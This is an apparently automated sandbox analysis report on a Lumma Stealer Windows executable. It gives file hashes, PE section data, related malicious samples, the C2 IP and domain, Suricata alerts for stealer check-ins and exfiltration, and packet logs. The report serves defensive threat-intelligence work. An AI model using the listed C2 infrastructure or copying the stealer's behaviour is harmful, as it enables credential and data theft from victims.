                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          104.21.11.101ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                            8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                              ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                    IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                      zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                        C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                          0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                            cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              mindhandru.buzzfer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              AaEBZ7icLd.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                              • 104.21.11.101
                                                                                                              ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 104.21.11.101
                                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              s-part-0035.t-0009.t-msedge.netwJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 13.107.246.63
                                                                                                              qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.63
                                                                                                              ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 13.107.246.63
                                                                                                              60Zxcx88Uv.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.63
                                                                                                              7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 13.107.246.63
                                                                                                              1fi2LiofgW.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.63
                                                                                                              zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 13.107.246.63
                                                                                                              54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.63
                                                                                                              TAX INVOICE - NBO2506000632.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.63
                                                                                                              installer.batGet hashmaliciousVidarBrowse
                                                                                                              • 13.107.246.63

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSfer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              AaEBZ7icLd.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                              • 104.21.11.101
                                                                                                              ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 104.21.11.101
                                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 104.21.11.101
                                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1fer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              AaEBZ7icLd.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                              • 104.21.11.101
                                                                                                              ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 104.21.11.101
                                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              No created / dropped files found

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.94535411637488
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:onaUtwpiyq.exe
                                                                                                              File size:1'869'312 bytes
                                                                                                              MD5:7c96eee8e62caedad10358116f0b8024
                                                                                                              SHA1:1816e4f69b7bf7e9b8a2a04ab5d0694896284357
                                                                                                              SHA256:ca2141db806dcfd4769d08d2bfa07449353fb1137d1aa3664f9afbd8e506d7b1
                                                                                                              SHA512:9be858e287fa3e34c5a3acaf1efde16c1c54b501ad27e0c47eb5f1db9e9b88bac7e3f78be75030e3613c3d4b95bbde7d2aa2006f7dc2882cad41113f48debf51
                                                                                                              SSDEEP:49152:ZtCGvxI8oyKYHik8HIXSmy46qH20eN5aub76a:7CGa8YBobnR2dH3
                                                                                                              TLSH:B485335D7C5B9CBBD06AA03125B30F87E9C2111C349F7B770A6B5293227B114AEE948F
                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................I...........@...........................I...........@.................................Y@..m..

                                                                                                              File Icon

                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x89b000
                                                                                                              Entrypoint Section:.taggant
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp 00007FF3D0F9048Ah
                                                                                                              pcmpgtb mm3, qword ptr [eax+eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              jmp 00007FF3D0F92485h
                                                                                                              add byte ptr [edi], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], dh
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [edx], ah
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ecx], al
                                                                                                              add byte ptr [eax], 00000000h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              pop es
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              0x10000x520000x26400eb5d105b3b6fe106c94a95a576b2a3dcFalse0.9996680964052288data7.984613246074543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              0x550000x2a60000x200d26ae836bf754c464248f68c8d457905unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              asctzxyj0x2fb0000x19f0000x19e400598922d1632166a637e91eede4a4f14dFalse0.994520759467411data7.953040311099013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              cphljqds0x49a0000x10000x6008b879990a17d041f800ed69c8130e7f1False0.5403645833333334data4.756450832050239IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .taggant0x49b0000x30000x2200445c658244a7959d2a05c7039431776bFalse0.07663143382352941DOS executable (COM)0.7675111198172956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              kernel32.dlllstrcpy

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-27T09:01:54.542493+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949712104.21.11.101443TCP
                                                                                                              2024-12-27T09:01:55.271561+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949712104.21.11.101443TCP
                                                                                                              2024-12-27T09:01:55.271561+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949712104.21.11.101443TCP
                                                                                                              2024-12-27T09:01:56.513604+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949718104.21.11.101443TCP
                                                                                                              2024-12-27T09:01:57.379739+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949718104.21.11.101443TCP
                                                                                                              2024-12-27T09:01:57.379739+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949718104.21.11.101443TCP
                                                                                                              2024-12-27T09:01:59.055245+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949724104.21.11.101443TCP
                                                                                                              2024-12-27T09:02:01.352480+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949730104.21.11.101443TCP
                                                                                                              2024-12-27T09:02:03.785693+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949736104.21.11.101443TCP
                                                                                                              2024-12-27T09:02:06.688005+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949742104.21.11.101443TCP
                                                                                                              2024-12-27T09:02:07.587181+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949742104.21.11.101443TCP
                                                                                                              2024-12-27T09:02:09.428663+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949749104.21.11.101443TCP
                                                                                                              2024-12-27T09:02:09.432641+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.949749104.21.11.101443TCP
                                                                                                              2024-12-27T09:02:12.999874+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949760104.21.11.101443TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 27, 2024 09:01:53.208939075 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:53.209048986 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:53.209148884 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:53.212138891 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:53.212171078 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:54.542413950 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:54.542493105 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:54.545589924 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:54.545625925 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:54.545897007 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:54.593400955 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:54.593482971 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:54.593518972 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:54.593657017 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:55.271605968 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:55.271733046 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:55.271825075 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:55.293381929 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:55.293409109 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:55.301342964 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:55.301398993 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:55.301470041 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:55.301731110 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:55.301742077 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:56.513437986 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:56.513603926 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:56.528724909 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:56.528768063 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:56.529145002 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:56.535629988 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:56.535659075 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:56.535753965 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379746914 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379807949 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379839897 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379863024 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.379877090 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379910946 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.379919052 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379973888 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.380004883 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.380009890 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.388005018 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.388051987 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.388057947 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.396303892 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.396354914 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.396365881 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.437135935 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.437145948 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.484040022 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.499336004 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.546513081 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.571564913 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575481892 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575525999 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575550079 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575567007 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575606108 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575615883 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575691938 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575735092 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575855970 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575867891 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575880051 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575886965 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.755786896 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.755841017 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.755991936 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.756303072 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.756314039 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.055078030 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.055244923 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.087526083 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.087563992 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.088212967 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.089349031 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.089519978 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.089560986 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.995136976 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.995258093 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.995322943 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.995620012 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.995642900 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:00.137840986 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:00.137893915 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:00.138004065 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:00.138341904 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:00.138359070 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.352343082 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.352479935 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.354206085 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.354212046 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.354495049 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.355830908 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.359347105 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.359396935 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.359462023 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.407334089 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.225608110 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.225733995 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.225799084 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.241777897 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.241812944 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.478156090 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.478200912 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.478266001 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.478806973 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.478822947 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.785567045 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.785692930 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.787058115 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.787070036 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.787302971 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.788923979 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.789052010 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.789083958 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.789148092 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.789156914 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:04.784077883 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:04.784185886 CET44349736104.21.11.101192.168.2.9
